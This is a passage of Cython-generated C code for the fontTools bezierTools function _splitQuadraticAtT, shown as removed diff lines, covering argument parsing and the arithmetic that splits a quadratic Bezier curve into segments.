NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, 
__pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, 1); __PYX_ERR(0, 701, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 701, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, 2); __PYX_ERR(0, 701, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 3) ? 
kwd_pos_args : 3; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "_splitQuadraticAtT") < 0)) __PYX_ERR(0, 701, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_splitQuadraticAtT", 0, 3, 3, __pyx_nargs); __PYX_ERR(0, 701, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_segments = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx 
= NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_i = NULL; - PyObject *__pyx_v_t1 = NULL; - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v_delta = NULL; - PyObject *__pyx_v_delta_2 = NULL; - PyObject *__pyx_v_a1x = NULL; - PyObject *__pyx_v_a1y = NULL; - PyObject *__pyx_v_b1x = NULL; - PyObject *__pyx_v_b1y = NULL; - PyObject *__pyx_v_t1_2 = NULL; - PyObject *__pyx_v_c1x = NULL; - PyObject *__pyx_v_c1y = NULL; - PyObject *__pyx_v_pt1 = NULL; - PyObject *__pyx_v_pt2 = NULL; - PyObject *__pyx_v_pt3 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - int __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *(*__pyx_t_5)(PyObject *); - Py_ssize_t __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_splitQuadraticAtT", 0); - __Pyx_INCREF(__pyx_v_ts); - - /* "fontTools/misc/bezierTools.py":702 - * - * def _splitQuadraticAtT(a, b, c, *ts): - * ts = list(ts) # <<<<<<<<<<<<<< - * segments = [] - * ts.insert(0, 0.0) - */ - __pyx_t_1 = PySequence_List(__pyx_v_ts); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 702, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_ts, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":703 - * def _splitQuadraticAtT(a, b, c, *ts): - * ts = list(ts) - * segments = [] # <<<<<<<<<<<<<< - * ts.insert(0, 0.0) - * ts.append(1.0) - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 703, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_segments = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":704 - * ts = list(ts) - * segments = [] - * ts.insert(0, 0.0) # <<<<<<<<<<<<<< - * ts.append(1.0) - * ax, ay = a - */ - __pyx_t_1 = 
__Pyx_PyObject_GetAttrStr(__pyx_v_ts, __pyx_n_s_insert); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 704, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":705 - * segments = [] - * ts.insert(0, 0.0) - * ts.append(1.0) # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_PyObject_Append(__pyx_v_ts, __pyx_float_1_0); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 705, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":706 - * ts.insert(0, 0.0) - * ts.append(1.0) - * ax, ay = a # <<<<<<<<<<<<<< - * bx, by = b - * cx, cy = c - */ - if ((likely(PyTuple_CheckExact(__pyx_v_a))) || (PyList_CheckExact(__pyx_v_a))) { - PyObject* sequence = __pyx_v_a; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 706, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_a); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 706, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = 
__Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 706, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 706, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_ax = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":707 - * ts.append(1.0) - * ax, ay = a - * bx, by = b # <<<<<<<<<<<<<< - * cx, cy = c - * for i in range(len(ts) - 1): - */ - if ((likely(PyTuple_CheckExact(__pyx_v_b))) || (PyList_CheckExact(__pyx_v_b))) { - PyObject* sequence = __pyx_v_b; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 707, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - 
__pyx_t_4 = PyObject_GetIter(__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 707, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 707, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 707, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":708 - * ax, ay = a - * bx, by = b - * cx, cy = c # <<<<<<<<<<<<<< - * for i in range(len(ts) - 1): - * t1 = ts[i] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 708, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 708, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 
1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 708, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_4 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 708, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 708, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 708, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":709 - * bx, by = b - * cx, cy = c - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_6 = PyObject_Length(__pyx_v_ts); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 709, __pyx_L1_error) - __pyx_t_1 = PyInt_FromSsize_t((__pyx_t_6 - 1)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (likely(PyList_CheckExact(__pyx_t_2)) || PyTuple_CheckExact(__pyx_t_2)) { - __pyx_t_1 = __pyx_t_2; __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_6 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 709, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 709, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_6); __Pyx_INCREF(__pyx_t_2); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_6); __Pyx_INCREF(__pyx_t_2); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } - } else { - __pyx_t_2 = __pyx_t_7(__pyx_t_1); - if (unlikely(!__pyx_t_2)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 709, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_2); - } - __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":710 - * cx, cy = c - * for i in range(len(ts) - 1): - * t1 = 
ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_v_i); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 710, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_XDECREF_SET(__pyx_v_t1, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":711 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * # calc new a, b and c - */ - __pyx_t_2 = __Pyx_PyInt_AddObjC(__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 711, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 711, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF_SET(__pyx_v_t2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":712 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * # calc new a, b and c - * delta_2 = delta * delta - */ - __pyx_t_4 = PyNumber_Subtract(__pyx_v_t2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 712, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":714 - * delta = t2 - t1 - * # calc new a, b and c - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * a1x = ax * delta_2 - * a1y = ay * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 714, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":715 - * # calc new a, b and c - * delta_2 = delta * delta - * a1x = ax * delta_2 # <<<<<<<<<<<<<< - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 715, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - 
__Pyx_XDECREF_SET(__pyx_v_a1x, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":716 - * delta_2 = delta * delta - * a1x = ax * delta_2 - * a1y = ay * delta_2 # <<<<<<<<<<<<<< - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 716, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":717 - * a1x = ax * delta_2 - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta # <<<<<<<<<<<<<< - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_ax, 2, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_v_delta); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1x, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":718 - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx - */ - __pyx_t_2 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_ay, 2, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_v_by); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":719 - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * c1x = ax * t1_2 + bx * t1 + cx - * c1y = ay * t1_2 + by * t1 + cy - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 719, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":720 - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx # <<<<<<<<<<<<<< - * c1y = ay * t1_2 + by * t1 + cy - * - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_v_bx, __pyx_v_t1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_t_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_8, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1x, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":721 - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx - * c1y = ay * t1_2 + by * t1 + cy # 
